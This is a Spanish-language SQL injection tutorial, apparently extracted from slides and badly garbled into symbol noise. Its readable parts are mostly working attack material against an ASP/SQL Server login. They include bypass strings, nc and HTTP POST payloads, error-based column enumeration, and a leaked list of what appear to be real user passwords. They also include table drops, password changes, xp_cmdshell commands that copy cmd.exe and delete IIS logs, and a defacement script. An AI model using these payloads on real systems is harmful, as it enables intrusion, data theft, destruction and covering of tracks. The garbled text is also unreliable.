'or 1=1— Usuario : 'or 1=1-- ! "" L V W A 47 " "& 9 = " . ) + . select * from users where username = ' or 1=1-- and password = ' or 1=1--
  • 16. @ 1 9 " 9 " < " " " >: > 9 " & " " " 6 6 " 6 E " 6 " ) F & . + = " " " " " " " . " " 1 ( , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) & " " 6 + 6 4 . " > " ">& " " " > 00 > E, ) / F " #$% ( & " " "& #$% 9 . 9 6 . . + # ) " " 7 " . " 6 " 9 . " < + " & " & " 6 " & " ) "& " . " " & ( " 6 . # . 4 & " " " " " " 9 < " " " )4 6 & .J " * >5 > > > " = + . " Usuario : Admin'-- Password : 'or 1=1-- 8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-- # " * "= + " . 4 & ) ) + " . 8 " & " 6 " ) 6 " " " > L > E' " F " " + > 00 > E, ) / F 6 9 " + " < "& " ) "
  • 17. " " > " . "> 6 " ) "& 9 " " " " . ) 4) # $ 7 ! . ! # 5 " " " " " * " < #$% + . & " 6 " ) 9 6 6 . " " ) " * " " " " . 9 " " ' + = " 9 " " & . + & = " * & ) 4 " > < " . > 9 " + * . " + " " " " " " ! " 9 . E' + < " F& " " " "& " " " " " . & . 9 9 " J " " ) " " "& + " 9 " 6 " " " & 4 & " 6 * " " " " " 6 " " " " ) 4 & " 6 " 4 & " + * " " " ) " < 6 . & . " 9 " " " . " " " 6 5 " * " " ) " * " " "& " 6 6 . " " ( " " " 9 D ) "9 " + * " " * " 1 7 ! $ 7 ! . % # " ' ; #$% # 6 & + " 6 " " 6 & " 6 . " " 6 ##$%#8 H8 & " > < > < Q " ) & " ) + > > " " " " ) " " #$% # 6 )Q ) " ) " ) " " * ) ) "& 6 " )4 "& + . ) " " * " 1 ) " " )4 " ) " " " . " 8 4 " " " " " . * .J 8 " " "& " " . * " " " " ) " + 6 " "
  • 18. B . 6 9# + & % " 9 " , . # 6 & . & " " " D " & " 6 " " " " " E' = " 5 F " " E8 " " * 9 " 9 " . ) " = " & 4 " " 6 " ( + ( & F 5 * " " " " " 9 " 6 " " & 9 6 " & " .J ) . 6 9 J * 9 " & . 4 & " " " " 9 = . " " 6 8 6 " " & M " " * " & 6 ) + #$%& = 4 & & 9 4 " " " Usuario : '; drop table usuarios-- Password : # * & " " 6 . " * EH " >8* " ! 6 . " >F & ) ) ) > " "> " & 9 " & .J " * " * " ' & + " " " & 6 " 6 ) ( " " & 6 5"= + & " 9 , # " " " " 9 " . 7 " " ) "& 9 ) " ( & ) = " + 1 $ % % + 67 & 4/ ) . $ : 3( ) & ! #& ! ) ) " * " " " " ( 7 " #$% 4 & " " " ) " 9 ) " " :,-' :%8 ,- 4 " #$% # 6 . ( D " # ) " " 9 & " . " & " " . 7< & " " " E " 9 ) " " ( = & . ) " 6 "& . " ) " 9 & + " " ) " " " * F
  • 19. C " 9 " " " 6 ) " + * 1 8 .1) 8 & " 9 6 ( " 6 " & 6 " " " 6 " ) " " " 9 " 6 ) " "& . " + * & " " * 9 " < " " 4 " " & + " " " 6 " " " " + " 6 ( " ! " " " . 4 & " " " ) " > L > E' # F " " D * " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 " 9 * " < " :,-' :)6 " " " * #$% % < ) " " " . " E > )Q ) >F 2 ! " * )Q ) & " 9 " 3 8 ) ) " " ( " > " > ? " " " " > . > - & " 9 6 + " 6 " . * 9 + . " " :,-' 8 )Q ) 1 3 % ) 010.8#* - "3.9$ (")-#) :;<< 123
  • 20. ----- Fragmento ----------------------------------------- <?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class DB_Sql { var $Host = ""; var $Database = ""; var $User = ""; var $Password = ""; var $UseODBCCursor = 0; var $Link_ID = 0; var $Query_ID = 0; var $Record = array(); var $Row = 0; var $Errno = 0; var $Error = ""; ----- Fragmento ----------------------------------------- - " " " " >" " > 6 " " 6 " " 6 ) " X " + X! "" " " . & " 9 " ( " " " . " " 6 " " " " * & . " 6 4 * . 9 " * & " "& 9 * 9 9 6 " #$%& A " + 6 & " " . " 6 " " " . " " < 9 " 6 " * " " " ) E8 " " = ) " )Q ) F : ) & * / ! :M& 6 " " 9 + #$% + " * 6 " ) " " ) " "& * . + " " " ) 9 4 * " + . & " 9 4 " " ) " 6 + .
  • 21. 8 " " 6 " " " " ( & " ( 7 " #$% 4 & " " ! " 9 " 6 " " " * & . " 6 4 6 " " & " " 9 " " ) "& J " " ( 9 " " " ) " " ) < 9 6 7 " ;;! " 6 " # " + ) " " ' % E8 M " " B * " + % " ' "F& 9 " " " ) 4 E5 . 6 & " . F " . . = " - " 9 " 6 " " " " 6 " * " 7 " ;;! " )4 6 & " < " "& ( 9 D " 6 " < & " " " 6 < & " . * nc -vv www.objetivo.com 80 < sentencias.txt ' " ' + " * " " ;;! * & ( " ** * E8 " " * # +1 & " 8 9 F& . . " ) )4 6 . " ) " + " D " * " E5 . ) " " " F& " 6 " " 8" * " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" >
  • 22. Y * . " Y H . " > " > * . " - & " . 9 " " * !:#; ) " " ** 6 < 9 4 < & " " ) " " " . ! " 9 " " . + " ) 9 " " " " ) " + ) > L > E' " F * & 6 6 " & ) ( " ) " * ) ( 6 * ! " " 6 " " " " " " #$% 9 " " E 6 .& . )+& F 8 )4 6 " " ( > > " " ' " " " " > "> #$%& " * " 6 " * " 9 6 9 #$% E 4 6 < & " 4 :%8 ,-F ) " " " " )" 6 "& " 4 " * 6 " " 6 " " H 6 " " " 4 < 6 " " " * " ( " 7 !:#; 9 " ( " 6= ( " ) 4 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
  • 23. 2 1 . $ " = 3 )*1( 5*'> ! ) 6 " " " . " " " 6 !:#;& " 9 " " " ) " > "> " " " " ;;! % ) " " ( * " " 9 6 " 6 " ! + 4 ' # Z ] ! + ' Z2- , " ! " Z25 O O 8" [ Z V # . . Z2, & ' Z ' E ! 7 " " Z B F ! 7 " " Z C U + Z28 T Z2' 5 ) ! [ " Z - 0 " 0 ^ - M # " Z?' Q " Q :MK 9 " ( " 4 < & " " " " ( " 6= & + 6 9 " ! " 6 " 6 = 9 " 6= " " " 9 " 6 " 9 " & + 6 " 9 " " " " " ) 8 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 " 9 " 9 . " " + > 6 .>& ) " 6 " * " 9 4 " " ! " " " & . " & " 7 * " 9 " " * " ) " " " " + " H " 9 4 " "
  • 24. 3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " & " )" 6 9 " 4 " & 6 :,-' #$% # 6 " 6 6 ) ) ) " " ( * " " . . E # 5 :#F& "= ) 7 " E " ,F 5 9 " ) ) & " * " = & " 6 6 " " * 4 < + ( " " * " " "& " " " ) # 5 :# H " 9 = " * " 6 !:#; POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . 4 6 " = & 6 " " . " Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select
  • 25. ? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " " & " 9 " " > 6 .> " 6 ( " >. )+> " ) + " , ) # 5 :#& " " , # . " .= & " " " " " + " " 9 ) # 5 :# ( " > . " > * " " "& " > 6 > " ) " + 8" " = * 'group by usuarios.UserID,usuarios.UID having 1=1-- #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85
  • 26. @ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-- #! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M 9 =& " )" 6 " + ) " . > " " 8 > 8 9 " " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ " 1 F A=4 " 9 " " !:#; ;;! 1: " & " 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8 6 . V 00F , " & " " 9 & * " * " " " " ) & ( " " " . " ' & . " " " " " . " 9 ;:,:# " " ) " " #8%8'; . & " "& 9 + 9 " " " " #8%8'; " + 9 * " " II 6 " 4 < " # 9 " * " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
  • 27. ( 7 E8" " >. )+> + > 6 .>F " ) = " " ) " > >& > > + > 2>& " ) = " < " > ?> E, * " " 9 " . * >#8%8'; _ A : ` a> " = " & " * ) " + " " " 7 F " " " " " " ) ( . " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-- &txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" " ) V) VL " "L )+ " F )+ 00 - 9 " " " III H "& ( " + > "> = ) " 9 " " # * " ( " " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " " " #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "
  • 28. B 4 ;:!& " 9 . " " ;:,:# " " ) )4 6 " !:#; 6 ;:! F % " 9 = " ) " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -- 7 " & 4 " 4 " + J . " " " E! 4 9 " " " " " ) ( " > >F ! 6 " " " 7 " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) ) # 5 :# " > " # )!% #, > % . " & 6 " . ;:! + " . " " " " ) " + " :- .# ! #& + 5 ) & & + " 6 ( 9 " " " . 6 " & ) " " ) " ) + " "& " 9 ) 7 " " 6 . " 9 " " % . " & " " " #$% > 1 :1>& D * ># EF> " # ) " 1 :1 " " " " >) " "> 9 " * . 4 #$%& " 9 " J " * "& " ) " J 6 " ) " " ! 4 & " " J 1 :1& " " " > >& ) " " " " " ) " " ! " * # EF& " ) " 7 " . " "
  • 29. C 5 9 " " . ) " " 6 " " ( " 4 "& & " + ; " " 6 " 4 < + 7 " * 9 . " . " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . 4 " " = 1 6 !:#; " " 6 )4 6 & ) " " " . < Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 - " " 6 9 6 :,-' " " ) " " & 4 6 " " E> ,> " 4 F " " ) 9 " I 8 " 9 " " " " 1:& 6 ( " " & " 6 " " 9 = " , ) 9 " " " " " ) ) ( & "= & + )
  • 30. 2 " " 6 "& " ) * " ( " " #$% ) " " ) " E! " " " )4 6 #$%KK& IIF 8 "& " " " " " " & " " " " " " #$% 1 :1& 9 4 " # + " " " & " ) ) " ( & ; !: ,8 ,5;: 9 " " " 9 " . " " ! " " . & 9 " 9 " " " + I :M& < ' " 5 + " < =" >5 6 #$% 4 ` a>& #$% ># > 6 * & 6 " " & #$% " < * " " 4 " 9 " " " " " " " " " " 4 " * 9 " 4 " + > ,> 8" " 4 " 4 6 9 " " 1H5 ' 5 EA " " " " F " 6 #$% " " >9 4 > 7 " 9 . # 1H5 ' 5 - & . " " 6 " 6 7 " . " " " + " " "& " . ) ) " " #$% ! . * & )" 6 " 9 " 6 1 &( ! (! # 5 :# 4 # # " " " # )!% #, " " " . " , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " " " " ! <1 " " " ! M " " " % " # " " " " , " " " , M " " , E1 ) " F " " # " " !G# E' " D F 8 ' 6 & " * * " ( " ) "& " " + " " "& . " " " 6 " < " ! & " > . " D > > . > " E! .J F 9 " & " " "& " " ) " 9 " . " " " ) " ) " " " " ) "& + " " " 6 " " > >& 9 ;:,5 * * 6 " )4 6 & b 1;5 >86 "& , " ) + 8 > . " " " " 4 . " , & " & E% " 9 ) 9 F . . 9 " + " "
  • 31. 2 4; ! * #! ! !< !& ! (! 6 ( #$%& ( " " " . " * ) " " )4 6 & ( . " " 7 " 9 " ) " = (! , 8 .= # . "& >) " > ) " " " . & " " 9 6 ) " " " A=4 " 9 * . " ) * * 4 . " " "" ) " " 6 & ( 7 " " " " > $6 3 / (! 6#; ! % " " " & " ( * #$% . ) " 6 " 1;: 9 " . " . " E% 9 " * 6 " 6 " ( F * * " 6 " " " , + !G# H 6 " " " F + 6 " * 9 ) = 6 !:#; + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y
  • 32. 2 H + L < 6 EB F " <VLL " <V <[ [L L[ "[L]L* " " U < " < " < < W -> $6 3 , 8 . ! (! 6#; ! 6 ( " " & " ) " + #8%8'; ) ( 7 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + "L " <& & & * < 00 ) ( " !:#; * & 6 :,-' 6 6 " " ) " 4 " * . ) " . * * " " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
  • 33. 22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! (! 6#; ! 6 ( ) " " " ) " "& ) ( " & " . + , :!& " " " . 4 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y H + L] ) < 00 - 6! ! ; " " " " " " " " . & " " " " 6 " " " . 6 ) " " " " "& "& 9 ( 6 " 9 . * & " " 5 " " " " " ) " " 9 " * & . . . " " " ) " " $+6 4 H " 4 9 " " " !:#; ( "" " . " " 6= + " !,5;8
  • 34. 23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " " " "VL1 6 ! ""L VL' L00 +4 4 4 # & . " * " !:#; & . " + 9 E5 9 " * 9 " " #$% # 6 F . " H + 'delete from usuarios where UID='Usuario'-- 1 4 $ " 1#8 ;& ) " 9 " " 4 & " " 9 & " " " "& " " 6 " 6 " " " " 9 + . " " " ! & " " ) ( . & + 4 " & . " E' " 4 KKKF " = " ) " . 9 = 9 " " ( " 7 & 6 " " " "& + . ( 9 " " " )
  • 35. 2? 5"= " & " 9 < " " " " 1#8 ; " " 9 " ) " & 4 * " + & " . = 9 " " " " ( " !:#; 6= :)6 7< " + . * 9 " + . & " ) " " " " + " " " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " " 6 " EL + " L&L +! "" LF00 % & & ! ! " . " . " ! " ) ( . " 7 " " " #$% 4 " " ( " " " " * " * & ) " 6 " II * 6 1: " " . & " " * " 9 " * #$% # 6 " >8< # ! "> " < " $ # ?4; $ # % " " < " " " & ,%%L" 9 < " " ) " " " " & " " " " 8< " " " " < "& 6 " #0#$%& " " ) * " 5 . " "& #0#$% ) " ) .
  • 36. 2@ " " " < " "& " " & * " ) ) " " " 9 " 5 ) " * " "& " " " " " " " " " " " 9 " + " ( " " " < Q " N Q " " 4 " " " 6 6= #$% > " > " K 6 " ( = " " " " . " 4 " " ;;! POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M ) " " " + * ) 9 " 4 & " ) 4 " #5 E 6 " " " ) " ( < Q " F , " * " " )" 6 " " " = " ) " * " 6 > > . 9 " ) " * . " 6 " E8 " " & & & " & F 5 4 & 6 " . " " * " 9 " " = 6 " " < Q " E/ " 1 ) 4 " ) " " = "F
  • 37. 2 ! " EXEC master..xp_cmdshell 'dir c:inetpubwwwroot' ! 6 9 6 EXEC master..xp_cmdshell 'type c:inetpubwwwrootalguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe c:inetpubwwwrootchroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:winntsystem32logfilesw3svc1' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:winntsystem32logfilesw3svc1 filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " " >8< # ! ">& " . " " " " >1 8< ">& " " ) 7 ) " & 4 " " " " " # " + " 'exec master..sp_addlogin MyUser, MyPass 9 " . " " ) 6 & " " ; " * & . . " " ) " 9 " ) & " " " " " ># ! "> + >8< # ! "> 9 ) = " " ) " " " " ! " " " " " & " * " + = #0#$% # 6 " * " " " " + " " " 6 " * "
  • 38. 2B " Q " Q " Q " + " Q * . " Q " 6 ) " Q . < Q ) "M < Q . < Q . < Q . M + < Q . 6 < Q" 6 < Q " < Q < Q 6 . - $ % + ) % " & * " & " " " + " " ) " " " + 7 " . " " #$% 4 & * + " ' " ) 4 ) " " & 4 " " 9 * ( " " " ( 4 " > * > % " 7 "& 9 " ( 67" #$% E$ + +( 9 9 " < ) " " #$% 6= :,-'F& " 9 " " #5& " ) " " 322& ) " . * 9 " # ) & " . " + " #$%& . " . - " " & 9 4 * " 1 & " . " > . (( # + ; >& " M <& < " " 7 " 6 " H " . " * . " ----- Extracto ------------------------------------------ [...] La idea es crear una página html o asp, si en el sitio objetivo se encuentra activo y funcionando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:web-hostingattajdidindex3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-- ></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
  • 39. 2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-- ></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- 